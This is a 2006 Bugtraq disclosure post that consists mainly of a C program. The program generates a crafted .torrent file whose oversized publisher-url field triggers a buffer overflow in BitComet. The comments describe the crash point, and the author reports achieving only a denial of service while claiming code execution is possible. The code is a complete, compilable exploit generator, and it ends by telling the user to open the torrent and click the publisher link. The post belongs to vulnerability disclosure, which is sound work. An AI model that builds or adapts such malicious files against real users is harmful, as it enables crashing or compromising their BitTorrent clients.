[42467] in bugtraq
BitComet URI Proof of Concept
daemon@ATHENA.MIT.EDU (nick58@gmail.com)
Thu Jan 26 19:28:55 2006
Date: 23 Jan 2006 00:09:41 -0000
Message-ID: <20060123000941.5603.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: nick58@gmail.com
To: bugtraq@securityfocus.com
#include <windows.h>
#include <stdio.h>
/*
* .::[ BitComet URI Buffer Overflow ]::.
*
* A vulnerability in BitComet, allows remote attackers construct a special .torrent file and put
* it on any BitTorrent publishing web site. When a user downloads the .torrent file and clicks
* on publishers name, BitComet will crash. An attacker can run arbitrary code on victims' host
* by specially crafted .torrent file.
*
* .text:0056057B mov edx, [eax]
* .text:0056057D push 0
* .text:0056057F push esi
* .text:00560580 mov ecx, eax
* .text:00560582 call dword ptr [edx+9Ch] <--- bug occurs here
*
* [Credits]: Fortinet Research
* [Notes]: I could only do DoS because the EAX and ECX were only controlled, and were seperated by 0's.
*/
char bof[] =
"d8:announce15:http://test.com"
"7:comment4:1234"
"13:comment.utf-84:1234"
"10:created by13:BitComet/0.60"
"13:creation datei1137897500e"
"8:encoding5:UTF-84:info"
"d6:lengthi0e"
"4:name8:null.txt"
"10:name.utf-88:null.txt"
"12:piece lengthi32768e"
"6:pieces20:\xDA\x39\xA3\xEE\x5E\x6B\x4B\x0D\x32\x55\xBF\xEF\x95\x60\x18\x90\xAF\xD8\x07\x09"
"9:publisher4:test"
"13:publisher-url19:http://www.test.com"
"19:publisher-url.utf-8";
char eof[] =
"e5:nodesll15:213.112.235.171"
"i31225eel14:210.49.100.112"
"i32459eel14:61.229.130.217"
"i17550eel14:200.88.148.239"
"i61154eel14:222.84.178.235"
"i17581eel14:220.210.178.80"
"i11385eel12:218.7.239.78"
"i50468eel12:130.158.6.55"
"i62093eel13:219.68.237.54"
"i26034eel12:82.83.53.230"
"i7836eeee";
int main(int argc, char **argv) {
FILE *fp;
char buf[2048];
printf("+---=[ BitComet URI Buffer Overflow ]=---+\n");
printf("+---=[ Coded by DiGiTALSTAR ]=---+\n\n");
printf("Opening torrent for writing... ");
if (!(fp = fopen("comet.torrent", "w"))) {
printf("FAILED\n");
exit(-1);
}
printf("OK");
memset(buf, '\x41', sizeof(buf));
printf("Writing torrent data... ");
if (fwrite(bof, 1, sizeof(bof)-1, fp) <= 0) {
printf("FAILED\n");
exit(-1);
}
if (fprintf(fp, "%d:", sizeof(buf)) <= 0) {
printf("FAILED\n");
exit(-1);
}
if (fwrite(buf, 1, sizeof(buf), fp) <= 0) {
printf("FAILED\n");
exit(-1);
}
if (fwrite(eof, 1, sizeof(eof)-1, fp) <= 0) {
printf("FAILED\n");
exit(-1);
}
printf("DONE\n");
fclose(fp);
printf("Now open the torrent in bitcomet and click test\n");
return 0;
}